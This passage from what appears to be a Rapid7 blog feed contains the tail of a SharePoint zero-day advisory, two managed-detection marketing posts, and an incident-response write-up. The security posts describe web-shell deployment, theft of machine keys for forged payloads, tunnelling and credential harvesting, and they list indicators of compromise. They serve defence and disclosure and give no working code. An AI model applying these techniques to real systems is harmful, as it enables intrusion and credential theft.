have been available since the July 8 content release.</span></p><h2 style="direction: ltr;">Technical details</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The exploit chain demonstrates a dangerous evolution in SharePoint exploitation techniques, blending old deserialization tricks with new methods of persistence and privilege escalation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Initial access begins with a specially crafted POST request to the vulnerable SharePoint endpoint: </span><span style='font-size: undefined;'><span data-type='inlineCode'>/_layouts/*/ToolPane.aspx</span></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This request leverages the way SharePoint renders controls on the page, ultimately coercing the server into executing embedded PowerShell commands. Once the attacker achieves execution, a malicious web shell named spinstall0.aspx is deployed to the server’s layouts directory.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>But this is just the foothold. What follows is a more sophisticated move: the attacker issues a GET request to their web shell and extracts the </span><span style='font-size: undefined;'><span data-type='inlineCode'>ValidationKey</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>DecryptionKey</span></span><span style='font-size: undefined;'> from the SharePoint server. These cryptographic keys are fundamental to how SharePoint authenticates users and protects sensitive session data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By stealing these secrets, attackers are no longer limited to reusing their initial exploit path. They can now forge their own authentication tokens, impersonate users, and craft valid payloads. There are tools available that make it easy to serialize malicious objects and sign them using the stolen keys. The result is full remote code execution (RCE) - without any need for the attacker to maintain access to the original vulnerable endpoint.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This technique is inspired by earlier attacks, notably CVE-2021-28474, where exploitation hinged on signing a malicious ViewState payload with the correct </span><span style='font-size: undefined;'><span data-type='inlineCode'>ValidationKey</span></span><span style='font-size: undefined;'>. Previously, this required access to the configuration file or memory - now, attackers simply steal those keys post-exploitation and move to the next phase.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What makes this particularly dangerous is that the persistence isn't just at the file level. Even if defenders remove the web shell or block access to </span><span style='font-size: undefined;'><span data-type='inlineCode'>ToolPane.aspx</span></span><span style='font-size: undefined;'>, the stolen cryptographic keys allow attackers to re-enter the environment at will, using signed payloads that are indistinguishable from legitimate traffic.</span></p><h2 style="direction: ltr;">Indicators of compromise (IOCs)</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>IP Addresses (Observed in exploitation)</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>107.191.58[.]76</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>104.238.159[.]149</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>96.9.125[.]147</span></span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>User-Agent Strings</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>URL-encoded variant for log searches: </span><span style='font-size: undefined;'><span data-type='inlineCode'>Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0</span></span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Malicious File</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>spinstall0.aspx</span></span><span style='font-size: undefined;'> (web shell)</span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>SHA256: </span><span style='font-size: undefined;'><span data-type='inlineCode'>92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Disk path: </span><span style='font-size: undefined;'><span data-type='inlineCode'>C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx</span></span></p></li></ul></ul><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 22, 2025:</strong></span><span style='font-size: undefined;'> Added new remediation info for Microsoft SharePoint Enterprise Server 2016. Clarified that InsightVM checks shipped on July 21.</span></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-microsoft-sharepoint-servers-cve-2025-53770</link>
      <guid isPermaLink="false">blt45d8285c26a1643e</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Tue, 22 Jul 2025 14:21:33 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Outnumbered. Never Outmatched: Inside Rapid7’s 24/7 Threat Response Engine]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>In today’s threat landscape, security teams face a harsh reality: attackers never rest, and defenders are stretched thin. As threats grow in volume, speed, and sophistication, the pressure on SOC teams is reaching a breaking point. That’s why we’re launching our new Managed Detection and Response (MDR) campaign with one simple truth: you may be outnumbered, but with Rapid7 MDR, you are never outmatched.</span></p><h3><span style='font-size: undefined;'>The MDR problem statement</span></h3><p><span style='font-size: undefined;'>The need for MDR has never been clearer. Security leaders are navigating a perfect storm of alert fatigue, talent shortages, and increasingly complex hybrid environments. Attackers are moving faster, using automation and AI to scale their operations. Meanwhile, internal teams struggle to triage thousands of alerts, stay ahead of threats, and prove the value of their efforts.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>According to Gartner, 60% of businesses will rely on MDR services by 2025 to extend their SOC’s reach (1). But not all MDR is created equal. Many services stop short at detection or pass off alerts without context. Rapid7 MDR goes further.</span></p><h3><span style='font-size: undefined;'>What makes Rapid7 MDR different</span></h3><p><span style='font-size: undefined;'>Rapid7 MDR delivers 24/7, expert-led detection and response across every layer of your environment, from endpoint to cloud, identity to network. Our AI-powered triage cuts through alert noise with 99.93% accuracy, giving analysts time back to focus on real threats. Our global SOC actively investigates and contains attacks in real time, while our platform integrates cleanly with your existing SIEM and XDR workflows. With named advisors guiding your strategy and total visibility into our operations, you get more than alerts. You get a partner that thinks like an attacker and acts like an extension of your team.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It’s MDR that thinks like an attacker, but acts like a teammate.</span></p><h3><span style='font-size: undefined;'>Start here: two essential guides for MDR success</span></h3><p>To help you take the next step in your detection and response strategy, we’re releasing two cornerstone resources:</p><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://www.rapid7.com/lp/mdr-buyers-guide/" target="_self"><span style='font-size: undefined;'><strong>The Complete MDR Buyer’s Guide</strong></span></a><span style='font-size: undefined;'>: What to look for, what to ask, and how to choose the right partner for your business.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://www.rapid7.com/lp/aws-generative-ai-solutions-ebook/" target="_self"><span style='font-size: undefined;'><strong>Scaling MDR Outcomes with AI, Powered by AWS eBook</strong></span></a><span style='font-size: undefined;'>: An inside look at how our SOC uses generative AI and agentic automation to investigate and respond to threats at scale.</span></p></li></ul><p>These assets are designed to help your team evaluate MDR options with clarity and confidence.</p><h3><span style='font-size: undefined;'>Why it matters now</span></h3><p><span style='font-size: undefined;'>Cybercrime is scaling like a business. AI-powered attacks, ransomware-as-a-service, and identity-based breaches are no longer edge cases. They’re everyday threats. And most teams can’t fight back alone.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR was built to close the gap between signal and response, risk and action, burnout and resilience.</span></p><h3><span style='font-size: undefined;'>Get started</span></h3><p><span style='font-size: undefined;'>Download the </span><a href="https://www.rapid7.com/lp/mdr-buyers-guide/" target="_self"><span style='font-size: undefined;'>buyer’s guide.</span></a><span style='font-size: undefined;'> Explore the </span><a href="https://www.rapid7.com/lp/aws-generative-ai-solutions-ebook/" target="_self"><span style='font-size: undefined;'>AWS eBook.</span></a><span style='font-size: undefined;'> And see how Rapid7 helps teams move faster, act smarter, and stay in control—even when they’re outnumbered.</span></p><hr><p style="direction: ltr;"><span style='font-size: undefined;'><em>(1) Source: Gartner, Market Guide for Managed Detection and Response Services, </em></span><span style='font-size: undefined;'>February 2023</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/outnumbered-never-outmatched-inside-rapid7s-24-7-threat-response-engine</link>
      <guid isPermaLink="false">blt09970f8552f52c3d</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[AWS]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 21 Jul 2025 14:10:22 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Recognized as a Leader in the 2025 Frost Radar™ for Managed Detection and Response]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>We’re proud to announce that Frost & Sullivan has named Rapid7 a Leader in its annual </span><a href="https://www.rapid7.com/lp/frost-radar-mdr-2025/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog&amp;utm_campaign=global-mdr-frost-radar-mdr-2025-prospect-eng" target="_self"><span style='font-size: undefined;'>Frost Radar™: Managed Detection and Response</span></a><span style='font-size: undefined;'> (MDR), affirming our position among the top innovators and fastest-growing providers in the category!</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This recognition comes as global security teams face steadily increasing pressure to </span><span style='font-size: undefined;'><em>do more with less, </em></span><span style='font-size: undefined;'>i.e. improve threat coverage, reduce operational complexity, and demonstrate security program value. As the MDR market matures, so do (and should) expectations from customers. This year’s Radar highlights the providers best positioned to deliver on those expectations by balancing advanced technology, proven service delivery, and a clear strategy for addressing the cybersecurity resilience needs of modern organizations.</span></p><h3><span style='font-size: undefined;'>Why Frost & Sullivan positioned Rapid7 as a Leader</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Frost & Sullivan considered 120 MDR vendors and evaluated 19 leaders in its Innovation and Growth index. </span><br/><span style='font-size: undefined;'>Rapid7’s placement as a Leader reflects our long-standing investment in core detection and response capabilities, alongside our ability to scale those innovations across a growing and diverse customer base. </span><br/><span style='font-size: undefined;'>Key contributors to our leadership, as highlighted by Frost & Sullivan, include:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Deep integration between MDR and exposure management, allowing organizations to close the loop between detection and risk with attack surface monitoring and risk-aware response</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>AI-powered triage and investigation support, delivering 200+ hours in weekly SOC time savings while maintaining 99.93% benign alert triage accuracy and full transparency into decision logic</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Shared, unified platform experience, giving customers direct access to the same tools our analysts use for investigation, detection, and response</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Support for over 180 native and third-party integrations, enabling visibility and protection across hybrid environments without requiring tool rip-and-replace</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>“Rapid7 focuses on delivering visibility, transparency, and peace of mind for its customers… aligning the development of its platform and service model to the most important mega trends in the space, such as AI-powered SOCs, third-party integration, preventative features, and more.” </span><span style='font-size: undefined;'><em>Frost & Sullivan, 2024 Frost Radar: MDR</em></span></p><h3><span style='font-size: undefined;'>The Market is catching up to the promise of MDR</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s placement as a Leader in this </span><a href="https://www.rapid7.com/lp/frost-radar-mdr-2025/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog&amp;utm_campaign=global-mdr-frost-radar-mdr-2025-prospect-eng" target="_self"><span style='font-size: undefined;'>Frost & Sullivan Radar</span></a><span style='font-size: undefined;'> comes at a pivotal moment for the MDR market. Organizations are no longer just looking for alert triage or outsourced detection – they need integrated, outcome-driven security operations. The convergence of detection response and exposure management, paired with the emergence of AI as a force multiplier, is reshaping what MDR must deliver to customers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Security teams today are tasked with more than stopping threats quickly – they must understand how those threats intersect with asset exposure and business risk. That requires an MDR partner that can integrate broad security telemetry, threat intelligence and contextual risk into a single platform for action. Without that connective tissue, SecOps is stuck in reactive cycles and fragmented experiences.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It is not enough for SecOps teams to ‘tick the box’ with an MDR provider, it is about delivering measurable outcomes. That means faster time to detect and respond, higher fidelity investigations, and reduced risk across the attack surface. To scale those outcomes, intelligent automation and agentic AI must be part of the approach. While human expertise remains essential for judgement and escalation, AI is critical for accelerating workflows, enhancing accuracy and extending the capacity of the SOC through autonomous technology.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That’s the future we’re building at Rapid7 – and why Frost & Sullivan recognized us as a Leader in MDR. We’re delivering the outcomes customers need today and innovating toward what they’ll demand tomorrow.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Interested in learning more about Rapid7’s approach to Managed Detection and Response? </span><a href="https://www.rapid7.com/services/managed-detection-and-response-mdr/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog&amp;utm_campaign=global-mdr-frost-radar-mdr-2025-prospect-eng" target="_self"><span style='font-size: undefined;'><em>Let’s discuss how you can be part of this future</em></span></a><span style='font-size: undefined;'><em>.</em></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/rapid7-recognized-as-a-leader-in-the-2025-frost-radar-for-managed-detection-and-response</link>
      <guid isPermaLink="false">blt72e1c3caff67ae93</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Awards]]></category><dc:creator><![CDATA[Cindy Stanton]]></dc:creator>
      <pubDate>Wed, 16 Jul 2025 15:15:16 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt39eb01dc7f434720/68779d36f2bd48596ada9d78/Managed_Detection_and_Response_2025_Radar_Image_Rapid7_Cropped.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Innovative Tunnelling and Forensic Tool Abuse: IR Tales from the Field]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'><em>Rapid7 Incident Response consultants Willow Shipperley and Noah Hemker contributed analysis and insight to this blog.</em></span></p><h2 style="direction: ltr;">Executive summary</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s Incident Response (IR) team was engaged to investigate an incident involving an attempted Cobalt Strike execution. The investigation uncovered twists and turns with pre-ransomware activities, tunneling tools, and attackers taking a page out of the defender’s playbook. The attacker took careful steps to maintain access to the environment through persistence that mimicked normal user behavior. This blog covers the techniques, indicators of compromise (IoCs), and detections for Rapid7 customers.</span></p><h2 style="direction: ltr;">Observed attacker behavior</h2><p style="direction: ltr;"><span style='font-size: undefined;'>In this incident, the attacker executed an elegantly obfuscated PowerShell command to establish a Cobalt Strike beacon. Cobalt Strike (CS) is often used after an attacker has gained a comfortable foothold in an environment; CS is a powerful and dynamic tool useful for maintaining persistent access and executing commands remotely. As with any IR investigation, it was imperative to gather answers effectively, beginning with knowing which questions to ask: w</span><span style='font-size: undefined;'><em>here</em></span><span style='font-size: undefined;'> did CS attempt to execute, </span><span style='font-size: undefined;'><em>who</em></span><span style='font-size: undefined;'> attempted to execute it, </span><span style='font-size: undefined;'><em>what</em></span><span style='font-size: undefined;'> other malicious activity occurred, and — most importantly — </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'> did an attacker get to this point in the first place?</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Initial scoping</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The first step in answering these questions involved compiling a list of IoCs from the identified activity. To start, these IoCs included Command & Control (C2) information (e.g., hardcoded IP addresses and the domains they resolve to) extracted from the obfuscated PowerShell command, and the name of the account that executed it. Searching for references to IoCs can reveal further information, including other malicious commands executed by the compromised account, other compromised assets, and other compromised accounts. As new IoCs are identified, it is critical to add each to the growing list and search for further references to them across the environment. Once compromised assets and accounts are identified, a containment strategy must be developed. Quarantining assets, disabling accounts, blocking host and network-based IoCs, and disabling remote services can all aid in containing a compromise before an attacker can attain their goals.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Following the initial scoping and containment measures, the investigation turned to reconstructing the attacker’s path through the environment in a timeline. This structure keeps focus on answering the most important questions, sheds light on the attacker’s goals, and identifies gaps that require deeper investigation. At the very end of this timeline was the attempted execution of a malicious batch script. The script’s name, location, and method of execution shared similarities to known ransomware tactics, techniques, and procedures (TTPs). Thankfully, the script’s execution was blocked by the endpoint security tooling used in the environment, and the typical pre-ransomware activity, such as disabling event logging, deleting backups, and killing processes, was not observed. This discovery revealed the attacker’s goals; however it did not provide insight into </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'> the attacker moved through the environment to get to this point, </span><span style='font-size: undefined;'><em>where</em></span><span style='font-size: undefined;'> the attacker acquired the credentials allowing such movement, or </span><span style='font-size: undefined;'><em>when</em></span><span style='font-size: undefined;'> the attacker first gained access to the environment.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Lateral movement with tunneling tools</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The first major breakthrough was identifying the execution of PuTTY Link (Plink) and Cloudflare Tunnel (Cloudflared), two versatile network traffic tunneling tools that allow a user to connect to network resources that might otherwise be inaccessible. Although the network tunneling tools were executed on a relatively small number of assets, the implications of an attacker abusing them loomed overhead. With either tool it would be simple to set up a Remote Desktop Protocol (RDP) or Secure Shell (SSH) connection between a compromised asset and attacker-controlled infrastructure for remote authentication, remote code execution (RCE), or both.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The attacker used Plink first, attempting to set up tunnels to external IP addresses for future RCE. Fortunately, each attempt was automatically blocked by endpoint security tooling. After those repeated failures, Cloudflared was introduced and used throughout the rest of the compromise. Why was Cloudflared successful where Plink had failed, when both tools produce similar results? The major difference was that while Plink attempted to establish connections directly to external C2 servers, Cloudflared proxied all external traffic through Cloudflare’s legitimate network. Since the compromised environment routed their network traffic through Cloudflare, the Cloudflared tool was able to establish and maintain malicious connections without trouble. This served the attacker well as both a means of successful network communication and defense evasion; the true IP addresses and domains associated with their C2 servers were not directly recorded, and their malicious traffic blended in amongst normal traffic generated in the environment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Beyond the expected communication with malicious external resources, Cloudflared was used for both RDP and SSH sessions </span><span style='font-size: undefined;'><em>between</em></span><span style='font-size: undefined;'> internal assets in the compromised environment as a method for lateral movement. However, the attacker took Cloudflared’s capabilities a step further by setting up network tunnels between internal assets in the environment. These internal tunnels functioned as a relay — not only for traditional remote access, but also to transfer data, execute commands, and deploy malware. Such dynamic and clever usage of Cloudflared indicated that the attacker was familiar with the compromised environment, and answered the important questions of </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'> the attacker moved throughout the environment, as well as </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'> the attacker was able to deploy CS and execute the ransomware batch script. To continue construction of the incident’s timeline, the next major question to answer was </span><span style='font-size: undefined;'><em>where</em></span><span style='font-size: undefined;'> the attacker acquired the account credentials that allowed for this lateral movement.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Credential access with FTK imager</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Credential access and harvesting can be performed through a plethora of techniques. Sometimes accounts have weak passwords that can be easily guessed, or poor security controls like a lack of multi-factor authentication (MFA). Other times password hashes, cached logon information, and LSA secrets are collected from registry hives or dumped from the memory of vital Windows processes like LSASS. These more complex credential harvesting methods require a deeper understanding of how Windows stores and uses passwords in practice to properly acquire and effectively use them. In this incident, the attacker performed no less than four different methods of credential harvesting.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The first method was a classic: an Active Directory (AD) brute-forcing tool — in this case, PlusBrute — tested combinations of common account names and passwords to see if any resulted in successful authentications. Not a particularly elegant method, but certainly simple and effective when a targeted environment’s security practices may be weak or outdated. The second and third methods, using the Impacket framework and WinRAR respectively, focused on the more complex credential information stored in registry hives, which can be cracked to reveal plaintext passwords or left intact in more complex techniques. The Impacket framework, a modular and open-source collection of Python scripts, was used in an attempt to extract only the relevant credential information from select registry hives, while the file compression and archiving tool WinRAR attempted to collect entire registry hives. However, the final credential harvesting method was of particular interest: the attacker installed a legitimate digital forensics tool.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Digital forensics tools come in many varieties. Several serve hyper-specific purposes, like parsing a single type of forensic artifact into a human-readable format, while others handle a wider scope of data collection, parsing, and analysis needs. By necessity, many of these tools have the ability to collect forensic artifacts that may contain encoded credential information, such as password hashes stored in registry keys, as those forensic artifacts often contain information vital to a security incident. As this can set off many antivirus programs, some of these tools will automatically create exceptions for common antivirus software to ensure that their intended functionality is not hindered.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In this incident, the attacker installed Exterro’s legitimate and free-to-use digital forensics tool, FTK Imager, on over a dozen assets. The installation process for FTK Imager included the creation of antivirus exceptions, allowing the attacker to collect entire registry hives as well as any other forensic artifacts containing useful credential information, without risk of interruption. </span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Initial access</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>These varied methods of credential harvesting filled in many gaps in the investigation’s timeline, and revealed where the attacker acquired the credential information necessary to move through the environment. The only question remaining was how and where the attacker first gained access to the environment. This key point of an incident is referred to as the initial access vector (IAV). Unfortunately, in many investigations, there is not enough relevant forensic data to clearly define the IAV. Despite that, there are many ways to hone in on the first few minutes of malicious activity in an incident. When an attacker first gains access to an asset, steps must be taken to understand what they have access to — it could be an individual’s home PC, or a valuable server in a corporate environment. To gather information, an attacker will execute discovery commands that provide details about the compromised asset, account, and accessible resources. In this incident, those initial discovery commands were executed by an old service account that did not require MFA for authentication. The poor security controls used by this account made it an easy target for initial access.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With these final pieces of information, the full timeline of the incident became clear. An attacker gained initial access to the environment through a service account with minimal protections. Through that service account, the attacker abused native Windows binaries to discover information about accessible and valuable assets. A series of credential harvesting techniques granted access to further accounts with high permissions, and network tunnelling tools were installed to move through the environment. Cloudflared provided the attacker with the necessary framework to deploy further malware, culminating in the attempted execution of CS and malicious scripts associated with ransomware.</span></p><h2 style="direction: ltr;">MITRE ATT&CK techniques</h2><table><tbody><tr><td><p><strong>Tactic</strong></p></td><td><p><strong>Technique</strong></p></td><td><p><strong>Details</strong></p></td></tr><tr><td><p>Credential Access</p></td><td><p>Brute Force: Password Guessing (T1110.001)</p></td><td><p>Plusbrute brute-forced a series of Active Directory (AD) domain accounts</p></td></tr><tr><td><p>Credential Access</p></td><td><p>OS Credential Dumping (T1003)</p></td><td><p>Impacket, WinRAR, and FTK Imager collected credentials from registry hives</p></td></tr><tr><td><p>Command & Control</p></td><td><p>Protocol Tunneling (T1572)</p></td><td><p>Plink and Cloudflared tunnelled traffic to and from external C2 servers</p></td></tr><tr><td><p>Command & Control</p></td><td><p>Proxy: Internal Proxy (T1090.001)</p></td><td><p>Cloudflared directed C2 traffic between internal assets</p></td></tr><tr><td><p>Command & Control</p></td><td><p>Proxy: External Proxy (T1090.002)</p></td><td><p>Cloudflared obscured traffic between compromised assets and C2 infrastructure</p></td></tr><tr><td><p>Lateral Movement</p></td><td><p>Remote Services (T1021)</p></td><td><p>Cloudflared facilitated lateral movement through RDP and SSH</p></td></tr><tr><td><p>Defense Evasion</p></td><td><p>Hide Artifacts: File/Path Exclusions (T1564.012)</p></td><td><p>FTK Imager created exclusions to prevent antivirus software from hindering its usage</p></td></tr><tr><td><p>Defense Evasion</p></td><td><p>Hide Artifacts: Hidden Files and Directories (T1564.001)</p></td><td><p>Cloudflared set its directory as System and Hidden upon installation</p></td></tr><tr><td><p>Defense Evasion</p></td><td><p>Masquerading: Match Legitimate Resource Name or Location (T1036.005)</p></td><td><p>Plusbrute and Plink both renamed their main binaries to match common legitimate binaries</p></td></tr><tr><td><p>Execution</p></td><td><p>Command and Scripting Interpreter: PowerShell (T1059.001)</p></td><td><p>Encoded PowerShell attempted to establish a Cobalt Strike beacon</p></td></tr><tr><td><p>Execution</p></td><td><p>Command and Scripting Interpreter: Windows Command Shell (T1059.003)</p></td><td><p>CMD attempted to execute a ransomware deployment batch script</p></td></tr></tbody></table><h2 style="direction: ltr;">Indicators of compromise</h2><table><tbody><tr><td><p><strong>Attribute</strong></p></td><td><p><strong>Value</strong></p></td><td><p><strong>Description</strong></p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Documents\bin\brtewin.exe</p></td><td><p>Primary PlusBrute AD brute-forcing binary</p></td></tr><tr><td><p>SHA-256 Hash</p></td><td><p>b6a5780f74d960c9556c214a99d7539045a97294e16856d15c10d9b786e81ff3</p></td><td><p>SHA-256 hash for primary PlusBrute binary</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Documents\bin\p.txt</p></td><td><p>List of common passwords to use with PlusBrute in a brute-force attack</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Documents\bin\u.txt</p></td><td><p>List of common or known account names to use with Plusbrute</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Documents\bin\success.txt</p></td><td><p>List of successful username/password combinations identified by PlusBrute</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\VMpKZCrk.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\oywswwOi.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\oshmuUHZ.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\ZJOSuwTO.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\nZxQmsKN.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Desktop\Exterro_FTK_Imager.exe</p></td><td><p>Primary FTK Imager digital forensics binary abused for credential harvesting</p></td></tr><tr><td><p>SHA-256 Hash</p></td><td><p>443843a3923a55d479d6ebb339dfbec12b5c1aabed196bf0541669abbe9b1c51</p></td><td><p>SHA-256 hash for primary FTK Imager binary</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Downloads\plink_win64_20241022.zip</p></td><td><p>ZIP archive containing PuTTY Link (Plink) network tunnelling files</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Downloads\adobe.exe</p></td><td><p>Primary Plink binary renamed to mimic known legitimate software</p></td></tr><tr><td><p>SHA-256 Hash</p></td><td><p>11f661ed2bf9db45fa1222557f8e3a7b14f5cc51b2b3ef530e52d64551e33d0b</p></td><td><p>SHA-256 hash for primary Plink binary</p></td></tr><tr><td><p>IP Address</p></td><td><p>173.44.141[.]244</p></td><td><p>External C2 IP address directly referenced by Plink</p></td></tr><tr><td><p>IP Address</p></td><td><p>45.61.141[.]34</p></td><td><p>External C2 IP address directly referenced by Plink</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Desktop\cloudflared.msi</p></td><td><p>Cloudflare Tunnel (Cloudflared) Windows installer file</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Program Files (x86)\cloudflared\cloudflared.exe</p></td><td><p>Primary Cloudflared network tunneling and proxy binary</p></td></tr><tr><td><p>SHA-256 Hash</p></td><td><p>f287dc99f9abe8f49510c78270b13fbb7a3fa0e22e53d1e061455a4d82901298</p></td><td><p>SHA-256 hash for primary Cloudflared binary</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\ProgramData\new.log</p></td><td><p>File referenced in PowerShell arguments of attempted Cobalt Strike execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\ProgramData\chi.log</p></td><td><p>File referenced in PowerShell arguments of attempted Cobalt Strike execution</p></td></tr><tr><td><p>IP Address</p></td><td><p>159.203.77[.]162</p></td><td><p>External C2 IP address encoded in the Cobalt Strike PowerShell command</p></td></tr><tr><td><p>Domain</p></td><td><p>rushpapers[.]com</p></td><td><p>Domain that the CS C2 IP address resolved to at the time of activity</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\ProgramData\1.bat</p></td><td><p>Batch script matching ransomware TTPs</p></td></tr></tbody></table><h2 style="direction: ltr;">Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 used </span><a href="https://www.rapid7.com/products/velociraptor/" target="_self"><span style='font-size: undefined;'>Velociraptor</span></a><span style='font-size: undefined;'> during this investigation to allow for remote triage and collection of forensic artifacts on the endpoint. Velociraptor can be leveraged for hunting IoCs at scale, refer to the Rapid7 Labs Repo </span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/Vql" target="_self"><span style='font-size: undefined;'>here</span></a><span 